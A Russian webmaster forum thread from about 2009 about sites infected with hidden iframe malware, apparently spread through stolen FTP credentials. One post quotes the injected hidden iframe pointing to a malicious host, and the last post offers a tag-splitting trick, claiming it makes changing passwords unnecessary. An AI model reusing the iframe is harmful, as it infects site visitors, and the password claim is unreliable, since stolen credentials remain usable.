- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году 36,9% всех DDoS-атак пришлось на сферу финансов
А 24,9% – на сегмент электронной коммерции
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Он может быть в папке шаблона, каких либо плагинов, и тому подобному. Подумайте что есть общего у этих сайтов в Топе и нет у тех которые не заражены... Общий шаблон, сборка дле с одного ресурса, если не лицензия конечно, и т.д.
Шаблоны разные, дле лицензия. Я думаю на самом деле мой ноут трояна поймал, надо просмотреть антивирусом. Антивирус давно не обновлял.
ппц, до чего дошли... Школьники, не изучив пхп, качают эксплойты и заражают сайты. Ибо, кто еще, кроме школьника, будет в index.php вставлять код с незакомментенными кавычками 😂
BlackSmoke добавил 29.07.2009 в 01:18
А по теме: смените фтп клиент и все пароли. Если бяка останется, пишите хостеру.
Поймал вот такую штуку <iframe src="http://x6r.ru:8080/index.php" width=192 height=154 style="visibility: hidden"></iframe> - появилось за день на разных хостингах, CMS, сайтах. Как эта гадость проникает и размножается?
Как эта гадость проникает и размножается?
Через ваш зараженный комп по ФТП.
Ребята, кто как решил проблему? У меня то же самое с iframe...
Среди файлов сайта были подозрительные папки с файлами "18200907sklip" и "ifyak170709" (поиск показывает, что подобные папки не только на моем сайте, но и на массе других). Папки были сразу же удалены, пароль от ftp был изменен. Но яндекс и гугл по-прежнему вторую неделю подряд среди ссылок сайта выдает левые ссылки из этих папок.
При этом, если ссылки нажимать, то естественно они никуда не ведут.
P.S. На компьютере, если что, вирусов тоже уже нет (если вдруг были), т.к. недавно была переустановлена операционная система.
Ребята, кто как решил проблему?
вообще тема, последние полгода поднимается практ. ежедневно - юзайте поиск: уже все возможные (и невозможные) варианты рассмотрены..(
В поиске под эту ситуацию с конкретным вирусом я только данную тему нашла, поэтому интересно.
Сайт - самописка на php. Была такая болезнь, решилась изменением набора прав.
Вирус однозначно. Либо chmod 444 или в totale файл-изменить атрибуты-444.
artsecurity, что скрипту помешает изменить права на файл вновь, если у него есть ваш логин и пароль, под которыми и осуществляется доступ к фтп ?
totale
Вот им лучше не пользоваться и пароли не сохранять. :)
Делюсь способом, который работает с 99% современных вирусов - ифреймеров:
Когда у меня возникла эта проблемма, я не мог поменять фтп пароль, так как основной доступ был у другого человека. Удалив пару раз коды фреймов на десятке своих сайтов, я решил сменить технику.
Как я заметил, ифреймы появляются в файле индекс.пхп или хтмл. Далее я заметил, что код вставляется после тега <body>, если его нет, то тогда - в самый конец документа.
Тогда я создал ловушку, разместив следущий код в файле index.php, в самом начале документа:
<?
$b="<BODY>";
?>
А сам тег <body> я вывел следущим образом:
<<?
echo "bo";
?>dy>
Поняли в чем дело? Первый код - это комментарии в php, содержащие тег, который ищут вирусы. И вирусы начали ставить коды в комментариях, которые не видны на сайте. А второй код body они уже не нашли, хотя возможно и не искали.
Вот и всё. Можно не менять пароль, права, обращаться к хостеру.